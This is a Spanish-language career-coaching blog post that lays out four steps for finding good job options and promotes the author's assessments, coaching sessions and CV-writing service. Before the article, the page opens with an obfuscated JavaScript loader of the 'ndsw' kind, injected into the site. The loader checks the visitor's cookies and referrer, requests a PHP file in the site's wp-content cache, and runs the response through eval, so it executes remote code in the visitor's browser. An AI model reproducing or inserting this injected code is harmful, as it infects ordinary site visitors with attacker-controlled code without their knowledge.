;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//lydiacuervo.com/wp-content/cache/object/045/d0b/d0b.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

¿Quieres conocer las claves para encontrar una buena opción profesional?

Hola!

Soy Lydia Cuervo, Coach de Carrera y Liderzgo, Analista del Talento; y una de las situaciónes más comunes a las que me enfrento cuando ayudo a las personas a encontra mejores opciones profesionales es sin duda enseñarles a cambiar su forma de pensar, a cambiar la manera en que tienen que afrontar la búsqueda, para encontrar las mejores opciones profesionales en base a sus talentos.

Muchas personas que inician la búsqueda de opciones profesionales, la llevan a cabo utilizando las mismas estrategias y formas de pensar que han utilizado por años, sin darse cuenta de que el mercado laboral ha cambiado con la pandemia y los procesos de selección también. Por lo que se les dificulta lograr los resultados que esperan. No se puede buscar una buena opción profesional utilizando las misma mentalidad, las mismas estrategias y las mismas herramientas que utilizaste antes de la pandemia.

El mercado laboral actual se caracteriza por su especialización, ahora mas que nunca las empresas demandan trabajadores con talentos extraordinarios que puedan adaptarse con agilidad a las nuevas necesidades del mercado y aportar valor presente y futuro a su proyecto empresarial.

Es precisamente esta especialización del mercado laboral la que requiere una preparación especial por parte de las personas; y el uso de estrategias y herramientas adecuadas que les permitan encontrar las mejores opciones profesionales y trabajo con seguridad y éxito en las actuales condiciones de mercado.

Y este es el objetivo de este blog, explicarte en 4 sencillos pasos, cuales son las claves para encontrar buenas opciones profesionales; y qué herramientas puedes utilizar para conseguir con éxito trabajo y las mejores opciones profesionales para ti en el actual mercado laboral.

Estás preparado/a, off we go!

4 PASOS PARA ENCONTRAR BUENAS OPCIONES PROFESIONALES

PASO 1: DEJA DE PREOCUPARTE Y ENFÓCATE PRIMERO EN DESCUBRIR EN QUÉ ERES BUENO/A

Lydia Cuervo Coaching para el EmpleoMuchos de mis clientes acuden a mí con el mismo problema: quieren encontrar una buena opción profesional, pero no tienen ni idea que les gustaría hacer, en qué son buenos/as y cuales son los trabajos que les ofrecen las mejores oportunidades profesionales.

Y yo siempre les respondo lo mismo: buscar una buena oportunidad profesional sin tener claro en que eres bueno/a, es como buscar una aguja en un pajar… emplearás mucho esfuerzo y tiempo buscando, pero difícilmente conseguirás los resultados que te propones en un mercado laboral centrado en encontrar talento extraordinario.

Todo proyecto en la vida, para que sea exitoso debe partir de la misma premisa: “lo primero, primero” (first things first). Si no descubres primero en que eres bueno/a, te llevará a comenter los siguientes errores:

1º. No saber en qué debes enfocar tu búsqueda: si no sabes en que eres bueno/difícilmente sabrás enfocar tu búsqueda para identificar que trabajos y empresas te ofrecen las mejores oportunidades profesionales para ti, perdiendo tiempo y energía.

2º. No ser productivo, no conseguir resultados: muchos de mis clientes albergan la creencia de que estando ocupados en la búsqueda están siendo productivos, lo que les lleva al auto-engaño: no por estar estar ocupado/a estás siendo eficaz a la hora de encontrar las mejores opciones profesionales para ti.

3º: No saber gestionar tu energía de manera eficaz: la pérdida tiempo y falta de resultados te conducirán a la frustración, a una mala gestión emocional y ala pérdida de autoestima.

Encontrar una buena opción profesional no depende por tanto de invertir un numero determinado de horas al día, sino de conseguir los resultados que buscas. Saber en que eres bueno/para es imprescindible para que puedas realizar una selección consciente y efectiva de opciones profesionales centrada en tus talentos, es decir, en lo que haces mejor que los demás, lo que te hace destacar frente a los demás.

¿Que 🛠 Herramientas te propongo para ayudarte a descubrir en que eres bueno/a, que opciones profesionales son las mejores para ti?

Si tienes problemas para determinar qué quieres hacer en tu carrera profesional y/o en que eres bueno/a, necesitas herramientas que te ofrezcan un diagnóstico objetivo y preciso de cuales son de tus talentos. Una evaluación del talento, o “Assesment Profiling”, es la herramienta profesional que utilizan las empresas para valorar el talento de los trabajadores. Contar con la misma herramienta que utilizan las empresas para medir el talento, te va a ayudar a identificar en que eres bueno, en que puestos de trabajo y en que empresas encajas mejor, es decir, encontrar oportunidades de trabajo y empresas en los que encajan mejor con tus talentos; y donde encontrar las mejores oportunidades profesionales, de desarrollo y crecimiento profesional centradas en tus talentos.

Si te interesa recibir una muestra de mis herramientas de evaluación del talento que utilizo como analista del talento certificada, contacta conmigo sin compromiso través de mi perfil Linkedin, o a través de mi web: www.lydiacuervo.com. Estaré encantada de enviarte una muestra y explicarte con más detalle como te ayuda a identificar en que eres bueno/a y a identificar las profesiones y los trabajos te ofrecen mejores oportunidades profesionales.

PASO 2: DEJA DE BUSCAR TRABAJO Y DESCUBRE TU VALOR COMO PROFESIONAL

¿Quieres encontrar una buena opción profesional pero no tienes ni idea de cual es el valor que aportas a las empresas? Esperar a encontrar una buena empresa que te ofrezca una buena opción profesional sin conocer tu valor no es muy realista… si no tienes confeccionada tu propuesta de valor, si no conoces tus fortalezas profesionales, tus habilidades, tus competencias, ¿Que te hace suponer que alguna empresa lo sabrá por ti?

Para que puedas encontrar una buena opción profesional de forma exitosa, es imprescindible que conozcas tuLydia Cuervo Asesoramiento Laboral valor profesional y que puedas confeccionar una propuesta de valor atractiva para las empresas en el actual mercado laboral.

¿Que 🛠 Herramientas te propongo para ayudarte a descubrir tu valor como profesional y tu potencial, es decir, el valor tanto actual como futuro que aportas a las empresas?

Para poder avanzar hacia tus metas profesionales de forma segura, sintiéndote en control, es imprescindible que utilices una herramienta de evaluación de perfil profesional. La misma herramienta que utilizan las empresas para identificar evaluar y medir el valor profesional de sus trabajadores.

Una evaluación de perfil profesional te ofrecerá un diagnóstico objetivo y preciso de tu perfil profesional y del valor presente y futuro que aportas a las empresas. Información imprescindible para que, una vez conocido el valor que aportas a las empresas, puedas hacer una selección objetiva de que puestos de trabajo y empresas son las que te ofrecen mejores oportunidades profesionales en base a tu valor.

Si te interesa recibir una muestra de mis 🛠 herramientas de evaluación de perfil profesional que utilizo como analista del talento certificada, contacta conmigo sin compromiso a través de mi perfil Linkedin, o a través de mi web: www.lydiacuervo.com. Estaré encantada de enviarte una muestra y explicarte con más detalle como te va a ayudar a identificar tu valor como profesional presente y futuro para poder encontrar las profesiones y puestos de trabajo que te ofrecen mejores oportunidades profesionales.

PASO 3: DEJA DE ENVIAR CURRICULUMS A CUALQUIER PUESTO Y DEFINE TUS EXPECTATIVAS, ANALIZA TU ENCAJE

Lydia Cuervo CoachUna vez conozcas en que eres bueno y cual es tu valor presente y futuro para las empresas, es hora de definir tus expectativas personales y profesionales; y aprender a analizar en que puestos de trabajo, carreras y empresas tus talentos y valor profesional encajan mejor.

Para ayudarte a definir tus expectativas y analizar en dónde encajas mejor, puedes hacerte las siguientes preguntas:

– ¿Qué horarios te gustaría tener?
– ¿Como te gustaría trabajar: presencial o teletrabajo?
– ¿En que tipo de empresas te gustaría trabajar?
– ¿Cual es tu grado de compatibilidad con la cultura, valores y objetivos de las empresas?
– ¿Que beneficios te gustaría conseguir de las empresas: recursos económicos, opciones de promoción y desarrollo profesional, flexibilidad, conciliación familiar, ayudas familiares ?
– ¿Qué talentos, fortalezas y competencias vas a necesitar para conseguir objetivos en las empresas y tener éxito en determinados trabajos/puestos?
– ¿Qué tareas te gustaría realizar todos los días?
– ¿Estas tareas, encajarán con tus talentos, tus fortaleza, con lo que haces mejor?
– ¿Estás suficientemente preparado/a para realizar estas tareas: tienes los suficientes conocimientos, experiencia, destrezas y habilidades para realizar la tarea?

¿Que 🛠 Herramientas te propongo para ayudarte a definir expectativas y analizar tu encaje profesional?

Para poder definir tus expectativas profesionales y medir tu encaje de forma segura y objetiva te recomiendo trabajar estas dos áreas con un Coach de Carrera. Un Coach de carrera te ayudará a identificar y definir tus expectativas; y te enseñará a analizar y medir tu encaje en los distintos puestos de trabajo y empresas. Áreas que son necesarias que trabajes para pode encontrar las mejores opciones profesionales para ti, centradas en tu personalidad, tus talentos y tus valores.

Si te interesa conocer más sobre el coaching de carrera y como te puede ayudar a definir expectativas y analizar tu encaje profesional, contacta conmigo sin compromiso a través de mi perfil Linkedin, o a través de mi web: www.lydiacuervo.com. Como coach de carrera estaré encantada de ofrecerte una consulta gratuita para poder explicarte con todo detalle, como son mis sesiones 1a1 y grupales de coaching de carrera y como te van a ayudar a trazar un plan de trabajo efectivo en la búsqueda de oportunidades de las mejores opciones profesionales para ti.

PASO 4: ACTUALIZA, OPTIMIZA TU CURRICULUM

El 75% de las personas que quieren encontrar buenas opciones profesionales No consiguen resultados porque sus Curriculum NO está preparados para pasar los nuevos filtros digitalizados del sistema de selección.

En estos días, aunque la economía está mostrando signos de recuperación, muchas personas todavía están sinCurriculum redactado por Experto trabajo, a punto de estarlo o planteándose un giro profesional. Nos encontramos en un mercado laboral altamente competitivo con muchas personas compitiendo por las mismas oportunidades, lo que significa que las posibilidades de destacarte entre otros candidatos no son tan grandes, especialmente si tu Curriculum NO cumple con los requisitos del sistema actual de selección.

El proceso de encontrar de mejores opciones profesionales conlleva una inversión de tiempo, esfuerzo y dinero, además de la pérdida de ingresos mientras estás buscando.

Si has identificado en que eres bueno/o, cual es tu valor como profesional, cuales son tus expectativas profesionales y en que puestos de trabajo y empresas encajas mejor; ten por seguro, que si tu curriculum No consigue pasar la fase inicial de selección, ningún reclutador, ninguna empresa podrá conocerte, ni analizar tu propuesta de valor; y perderás valiosas oportunidades.

¿Que 🛠 herramientas te propongo para ayudarte a tener un curriculum que cumpla con los requisitos del sistema actual de selección y que te permita conseguir más entrevistas?

Si quieres tener un Curriculum que pueda ser digitalizado, que te posicione dentro del ranking del 4% de mejores candidatos y que puedas pasar el primer filtro de selección para empezar a tener más entrevistas, la herramienta clave que te recomiendo es un Curriculum redactado por un experto.

¿Que ventajas te ofrece tener un Curriculum redactado por un Experto?

1ª. Ahorrarás tiempo: evitando el letargo o la vacilación a la hora de escribir tu currículum, pudiendo dedicar este valioso tiempo a la búsqueda de trabajo.
2ª. Tendrás un curriculum redactado según las preferencias de los reclutadores, las distintas industrias y niveles profesionales.
3ª. Tendrás un curriculum actualizado y optimizado según tu nivel de desarrollo profesional y los nuevos requisitos en el actual mercado laboral.
4ª. Tendrás un curriculum que te presentará como el mejor candidato: aunque tu no le des importancia, la apariencia importa. Tu currículum debe tener una apariencia profesional pulida, libre de errores y que muestre claramente la información más importante sobre tu carrera de manera convincente.
5ª. Tendrás un curriculum que te presentará a las empresas con una descripción objetiva de tu valor como profesional.
6ª. Tendrás un curriculum que analizará tu historial laboral, recortando el exceso.
7ª. Tendrás un curriculum que mostrará cuál es tu valor para las empresas reclutadoras.
8ª. Tendrás un curriculum único, creativo e impactante que te destacará como candidato.
9ª. Tendrás un currículum optimizado, apto para el proceso de selección digitalizado.
10ª. Tendrás un curriculum que incrementará las posibilidades de que obtengas entrevistas.
11ª. Tendrás tu curriculum listo en solo 10 días.

Si te sientes estancado/a, si tu curriculum no logra nunca pasar a la fase de entrevistas, si te interesa conocer más sobre la redacción de curriculum, carta de presentación y perfil de Linkedin por un experto y como te va a ayudar encontrar las mejores oportunidades profesionales, contacta conmigo sin compromiso a través de mi perfil Linkedin, o a través de mi web: www.lydiacuervo.com. Encantada de ofrecerte una consulta gratuita para poder explicarte con todo detalle, en que consiste mi servicio profesional de redacción de curriculum, carta profesional y perfil de Linkedin en ingles y español por un experto; y como te va a ayudar a tener entrevistas!

¿No conoces el Coaching de Carrera?

¿No conoces el Coaching de Carrera? Solicita una Consulta Gratuita, estaré encantada de conocerte y ampliarte información sobre como mis Programas y mis sesiones de Coaching de Carrera te van a ayudar de manera segura y exitosa a encontrar el trabajo que deseas con menos esfuerzo.

Espero que este blog te haya ayudado a conocer que pasos necesitas dar para encontrar buenas opciones profesionales y te haya aportado valor mostrándote que 🛠 herramientas y pasos pueden ayudarte a encontrar tu próximo trabajo con confianza y éxito.

Recuerda: ¡Nunca sabrás lo valioso que eres para las empresas hasta que lo descubras!

¿Necesitas más ayuda con tu búsqueda de trabajo? ¿No conoces el Coaching de Carrera? Solicita una Consulta Gratuita Online, estaré encantada de conocerte y ampliarte información sobre como mis Programas y mis Sesiones 121 y Grupales de Coaching de Carrera Online/Presenciales te van a ayudar a encontrar trabajo con menos esfuerzo y eficacia.

Si deseas recibir asesoramiento profesional GRATUITO en tu bandeja de entrada, puedes suscribirte a mi blog Lydia Cuervo.

Lydia Cuervo, Coaching de Carrera Profesional y Liderazgo, CEO y Fundadora de CAREER PRO**, un Programa que ha REVOLUCIONADO el AVANCE PROFESIONAL ayudando a profesionales de alto Rendimiento a alcanzar OBJETIVOS de ALTO NIVEL con Agiidad. Con más de 20 años de experiencia multifuncional en el mundo real, Lydia ha trabajado con profesionales de Europa, EE. UU. y Rusia. Incluso ha hecho cambios de carrera y también ha trabajado con empresas emergentes y establecidas, lo que me brinda una perspectiva única sobre cómo tener éxito en una variedad de entornos profesionales.

Leave a Reply

Your email address will not be published. Required fields are marked *

This field is required.

This field is required.

error

Enjoy this blog? Please spread the word :)

LinkedIn
LinkedIn
Follow by Email

Si continuas utilizando este sitio aceptas el uso de cookies. más información

Los ajustes de cookies de esta web están configurados para "permitir cookies" y así ofrecerte la mejor experiencia de navegación posible. Si sigues utilizando esta web sin cambiar tus ajustes de cookies o haces clic en "Aceptar" estarás dando tu consentimiento a esto.

Cerrar